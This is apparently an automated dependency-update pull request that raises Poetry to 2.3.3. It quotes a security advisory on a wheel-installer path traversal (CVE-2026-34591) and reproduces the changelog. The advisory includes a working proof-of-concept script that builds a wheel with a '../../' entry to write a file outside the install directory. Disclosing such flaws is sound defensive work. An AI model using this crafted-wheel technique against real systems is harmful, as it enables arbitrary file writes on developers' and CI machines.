chore(deps): update dependency poetry to v2.3.3 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
poetry (changelog)	==2.3.2 → ==2.3.3

GitHub Vulnerability Alerts

CVE-2026-34591

Summary

A crafted wheel can contain ../ paths that Poetry writes to disk without containment checks, allowing arbitrary file write with the privileges of the Poetry process.

Impact

Arbitrary file write (path traversal) from untrusted wheel content. Impacts users/CI/CD systems installing malicious or compromised packages.

Patches

Versions 2.3.3 and newer of Poetry resolve the target paths and ensure that they are inside the target directory. Otherwise, installation is aborted.

Details

Poetry’s wheel destination path is built by directly joining an untrusted wheel entry path:

src/poetry/installation/wheel_installer.py:47
src/poetry/installation/wheel_installer.py:59

The vulnerable sink is reachable in normal installation:
src/poetry/installation/executor.py:607

No resolve() + is_relative_to() style guard is enforced before writing.

POC

from pathlib import Path
import tempfile, zipfile, sys
from installer import install
from installer.sources import WheelFile
from poetry.installation.wheel_installer import WheelDestination

root = Path(tempfile.mkdtemp(prefix="poetry-poc-"))
wheel = root / "evil-0.1-py3-none-any.whl"
base = root / "venv" / "lib" / "pythonX" / "site-packages"
for d in [base, root/"venv/scripts", root/"venv/headers", root/"venv/data"]:
    d.mkdir(parents=True, exist_ok=True)

files = {
    "evil/__init__.py": b"",
    "../../pwned.txt": b"owned\n",
    "evil-0.1.dist-info/WHEEL": b"Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n",
    "evil-0.1.dist-info/METADATA": b"Metadata-Version: 2.1\nName: evil\nVersion: 0.1\n",
}
files["evil-0.1.dist-info/RECORD"] = ("\n".join([f"{k},," for k in files] + ["evil-0.1.dist-info/RECORD,,"])+"\n").encode()

with zipfile.ZipFile(wheel, "w") as z:
    for k,v in files.items(): z.writestr(k,v)

dest = WheelDestination(
    {"purelib":str(base),"platlib":str(base),"scripts":str(root/"venv/scripts"),"headers":str(root/"venv/headers"),"data":str(root/"venv/data")},
    interpreter=sys.executable, script_kind="posix"
)
with WheelFile.open(wheel) as src:
    install(src, dest, {"INSTALLER": b"PoC"})

out = (base / "../../pwned.txt").resolve()
print("outside write:", out.exists(), out)

---

Release Notes

python-poetry/poetry (poetry)

v2.3.3

Compare Source

Fixed

• Fix a path traversal vulnerability in the wheel installer that could allow malicious wheel files to write files outside the intended installation directory (#​10792).
• Fix an issue where git dependencies from annotated tags could not be updated (#​10719).
• Fix an issue where empty VIRTUAL_ENV or CONDA_PREFIX environment variables (e.g., after conda deactivate) would cause Poetry to incorrectly detect an active virtualenv (#​10784).
• Fix an issue where an incomprehensible error message was printed when .venv was a file instead of a directory (#​10777).
• Fix an issue where HTTP Basic Authentication credentials could be corrupted during request preparation, causing authentication failures with long tokens (#​10748).
• Fix an issue where poetry publish --no-interaction --build requested user interaction (#​10769).
• Fix an issue where poetry init and poetry new created a deprecated project.license format (#​10787).

Docs

• Clarify the differences between poetry install and poetry update (#​10713).
• Clarify the section of fields in the pyproject.toml examples (#​10753).
• Add a note about the different installation location when Python from the Microsoft Store is used (#​10759).
• Fix the system requirements for Poetry (#​10739).
• Fix the poetry cache clear example (#​10749).
• Fix the link to pipx installation instructions (#​10783).

poetry-core (2.3.2)

• Fix an issue where platform_release could not be parsed on Debian Trixie (#​930).
• Fix an issue where using project.readme.text in the pyproject.toml file resulted in broken metadata (#​914).
• Fix an issue where dependency groups were considered equal when their resolved dependencies were equal, even if the groups themselves were not (#​919).
• Fix an issue where removing a dependency from a group that included another group resulted in other dependencies being added to the included group (#​922).
• Fix an issue where PEP 735 include-group entries were lost when [tool.poetry.group] also defined include-groups for the same group (#​924).
• Fix an issue where the union of <value> not in <marker> constraints was wrongly treated as always satisfied (#​925).
• Fix an issue where a post release with a local version identifier was wrongly allowed by a > version constraint (#​921).
• Fix an issue where a version with the local version identifier 0 was treated as equal to the corresponding public version (#​920).
• Fix an issue where a != <version> constraint wrongly disallowed pre releases and post releases of the specified version (#​929).
• Fix an issue where in and not in constraints were wrongly not allowed by specific compound constraints (#​927).

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.

📢 Thoughts on this report? Let us know!